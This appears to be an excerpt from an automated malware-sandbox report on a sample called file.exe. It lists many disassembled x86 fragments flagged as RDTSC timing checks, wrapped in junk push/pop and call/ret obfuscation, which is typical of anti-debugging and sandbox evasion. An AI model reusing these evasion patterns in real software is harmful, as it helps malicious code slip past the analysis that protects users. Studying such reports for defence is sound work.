Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E011 second address: B6E015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E29C second address: B6E2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7C9 second address: B6E7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7CD second address: B6E7E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E7E1 second address: B6E815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C3h 0x00000009 pop edx 0x0000000a popad 0x0000000b push edi 0x0000000c jns 00007FB8FCCA77BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FB8FCCA77BAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E815 second address: B6E819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7055A second address: B70560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B70560 second address: B70564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708CE second address: B708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B708DC second address: B708E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709BB second address: B709C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C1 second address: B709C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B709C5 second address: B709C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71165 second address: B71176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71432 second address: B71438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71438 second address: B71449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B715E3 second address: B71605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCCA77BFh 0x00000008 jg 00007FB8FCCA77B6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71605 second address: B7160A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B72511 second address: B72518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B735E7 second address: B73609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64889h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73609 second address: B7361F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76224 second address: B76228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76228 second address: B7622E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7622E second address: B76239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCD64876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76239 second address: B76247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA3 second address: B7ADA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADA7 second address: B7ADAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADAB second address: B7ADB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADB1 second address: B7ADCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADCD second address: B7ADD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7ADD1 second address: B7AE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FB8FCCA77B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 movzx ebx, bx 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+1245C5E2h], ecx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FB8FCCA77B8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a xor edi, dword ptr [ebp+122D17EBh] 0x00000050 xchg eax, esi 0x00000051 push esi 0x00000052 jnl 00007FB8FCCA77BCh 0x00000058 pop esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7AE3C second address: B7AE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE6D second address: B7BE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE73 second address: B7BE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7BE78 second address: B7BF0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB8FCCA77BDh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB8FCCA77B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cmc 0x0000002a push 00000000h 0x0000002c jmp 00007FB8FCCA77BDh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FB8FCCA77B8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d jnc 00007FB8FCCA77BBh 0x00000053 xchg eax, esi 0x00000054 jmp 00007FB8FCCA77C6h 0x00000059 push eax 0x0000005a pushad 0x0000005b jnp 00007FB8FCCA77B8h 0x00000061 pushad 0x00000062 jbe 00007FB8FCCA77B6h 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CF7A second address: B7CFA1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FB8FCD64887h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7CFA1 second address: B7CFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF0A second address: B7DF54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a or edi, 1B053CEFh 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D299Ch] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCD64878h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 sub dword ptr [ebp+1245C6E8h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 jp 00007FB8FCD64876h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7DF54 second address: B7DF67 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCCA77B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FF8F second address: B7FFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FB8FCD6487Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB8FCD64882h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7FFC5 second address: B7FFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E17B second address: B7E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7F12D second address: B7F132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E181 second address: B7E1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8FCD64888h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF0 second address: B80FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7E1A0 second address: B7E1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FF4 second address: B80FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B80FFA second address: B81015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD64887h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81015 second address: B81019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82121 second address: B82127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82127 second address: B8212B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8222F second address: B82233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B82233 second address: B8223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8512D second address: B85132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85132 second address: B85138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85138 second address: B851BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FB8FCD64888h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FB8FCD64878h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 movzx ebx, cx 0x0000002c pushad 0x0000002d or dword ptr [ebp+122D1EB4h], ebx 0x00000033 mov edi, 251125DEh 0x00000038 popad 0x00000039 push 00000000h 0x0000003b jng 00007FB8FCD6488Fh 0x00000041 push 00000000h 0x00000043 mov di, 22C1h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BB second address: B851BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851BF second address: B851C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851C9 second address: B851CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851CE second address: B851D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B851D4 second address: B851E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B86117 second address: B86121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B880D3 second address: B880E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jno 00007FB8FCCA77B6h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8905A second address: B890B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FB8FCD6487Ah 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FB8FCD6487Ch 0x00000013 nop 0x00000014 adc ebx, 2D232F5Eh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FB8FCD64878h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 mov bx, cx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007FB8FCD6487Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AE97 second address: B8AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8FCCA77C0h 0x00000008 jmp 00007FB8FCCA77C1h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8315C second address: B83160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83160 second address: B83164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83164 second address: B8316E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8316E second address: B83172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B83172 second address: B83176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B4CB second address: B8B585 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FB8FCCA77B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007FB8FCCA77C8h 0x0000002c pop edi 0x0000002d mov dword ptr [ebp+122D2388h], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FB8FCCA77B8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+1245F3BAh] 0x00000057 xchg eax, esi 0x00000058 jg 00007FB8FCCA77D7h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push edi 0x00000063 pop edi 0x00000064 jmp 00007FB8FCCA77BDh 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8823F second address: B88243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88243 second address: B8824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8824D second address: B88251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88251 second address: B882CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or di, CE91h 0x0000000d mov edi, dword ptr [ebp+122D242Ch] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB8FCCA77B8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push edi 0x0000003c jmp 00007FB8FCCA77BAh 0x00000041 pop ebx 0x00000042 mov eax, dword ptr [ebp+122D0CADh] 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FB8FCCA77B8h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 cld 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8D3A4 second address: B8D3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904DC second address: B904E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E1 second address: B904E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B904E7 second address: B90501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B90501 second address: B90505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309B8 second address: B309C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B309C1 second address: B309F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Fh 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FB8FCD64887h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94350 second address: B94360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94360 second address: B94370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007FB8FCD64876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B94370 second address: B9439B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FB8FCCA77BAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
